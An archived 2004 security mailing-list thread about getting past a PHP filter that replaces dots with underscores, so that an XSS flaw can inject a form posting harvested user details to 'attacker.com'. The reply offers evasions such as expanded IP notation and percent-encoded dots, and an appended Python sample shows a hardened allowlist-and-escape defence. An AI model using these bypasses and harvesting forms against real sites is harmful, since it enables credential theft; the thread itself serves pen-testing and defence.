WebApp Sec mailing list archives
RE: Fullstop Substitution in XSS
From: "Michael Silk" <michaels () phg com au>
Date: Tue, 1 Jun 2004 10:07:49 +1000
Well, in the old days, an IP (127.0.0.1) used to be able to be replaced by the expanded notation (127 * 2^24 + 0^16 + 0^8 + 1); perhaps check if that still works (although I seem to remember it doesn't).

Other than that (and possible DNS infiltration), consider sites that, upon an invalid domain (http://yahoo?test@hello), redirect to somewhere else ... even some search sites ... i.e. perhaps you could execute a search which your malicious site (attacker.com) would make note of.

Or ... you say you tried hex encoding ... i.e. this? If the result is:

<form target="INPUT GOES HERE">

INPUT GOES HERE could be ...

-------------------------------------
http://www%2egoogle%2ecom
-------------------------------------

If the % gets translated at the time of sending to the site, hex-encode that, because the above is *exactly* what should appear in the source of the form tag, not the decoded result.

-- Michael

-----Original Message-----
From: Calum Power [mailto:enune () fribble net]
Sent: Saturday, 29 May 2004 2:49 PM
To: webappsec () securityfocus com
Subject: Fullstop Substitution in XSS

Hi all,

As a part of a recent Pen-Test, I came across an XSS vulnerability. The PHP script that has this vuln is filtering fullstops (.) and replacing them with underscores (_).

Now, I'm trying to write a Proof-of-Concept, in which a (convincing) form would be output that could 'harvest' user details and send them to an attacker's webserver. My problem lies in the output of the form tags. Any:

<form target="http://attacker.com/path/to/script">

is of course being filtered into:

<form target="http://attacker_com/path/to/script">

Has anyone else had a similar problem? I've tried using hex and unicode encoding, to no avail (they get decoded before the filtering, obviously).

Any help would be appreciated.

Cheers,
Calum

--
Calum Power
Cultural Jammer
Security Enthusiast
Hopeless Cynic
enune () fribble net
http://www.fribble.net
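As an added illustration (not code from either poster), here is the thread's dot-to-underscore sanitiser in Python beside a hardened renderer: replacing "." with "_" is a one-character blacklist, so a destination spelled without dots (the expanded-notation address Michael mentions) passes through untouched, whereas allowlisting the form's destination host and attribute-encoding the output stops both off-site submission and attribute breakout. The allowlist host example.org and the decimal address used in the checks are constructed values; the URL a form submits to is its action attribute, which is what the renderers emit.

```python
import html
from urllib.parse import urlsplit

# Constructed allowlist of hosts a form on this site may submit to.
ALLOWED_HOSTS = frozenset({"example.org"})


def dot_filter(value: str) -> str:
    """The sanitiser described in the thread: every '.' becomes '_'.

    It is a blacklist on a single character, applied after the
    application has already URL-decoded the input, so it only
    disrupts hostnames that happen to be written with dots.
    """
    return value.replace(".", "_")


def render_form_weak(target: str) -> str:
    """Reflects the filtered input straight into the action attribute."""
    return f'<form action="{dot_filter(target)}">'


def render_form_safe(target: str, allowed_hosts=ALLOWED_HOSTS) -> str:
    """Hardened rendering: allowlist the destination, then attribute-encode.

    The allowlist stops the form posting off-site however the host is
    spelled (dots, percent-escapes, or a decimal IP literal); html.escape
    stops the value from closing the attribute or the tag. Each control
    covers a failure the other does not, so both are needed.
    """
    try:
        parts = urlsplit(target)
        ok = parts.scheme in ("http", "https") and parts.hostname in allowed_hosts
    except ValueError:  # malformed URL, e.g. unbalanced IPv6 brackets
        ok = False
    if not ok:
        target = "/"  # fall back to a same-origin relative path
    return f'<form action="{html.escape(target, quote=True)}">'
```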
Current thread:
- Fullstop Substitution in XSS Calum Power (May 31)
- RE: Fullstop Substitution in XSS V. Poddubniy (Jun 01)
- RE: Fullstop Substitution in XSS Harry Metcalfe (Jun 01)
- RE: Fullstop Substitution in XSS Pete Foster (Jun 01)
- Re: Fullstop Substitution in XSS windo (Jun 01)
- Re: Fullstop Substitution in XSS Jonathan Stade (Jun 01)
- Re: Fullstop Substitution in XSS Liam Quinn (Jun 01)
- Re: Fullstop Substitution in XSS Joseph Birr-Pixton (Jun 01)
- <Possible follow-ups>
- RE: Fullstop Substitution in XSS Michael Silk (Jun 01)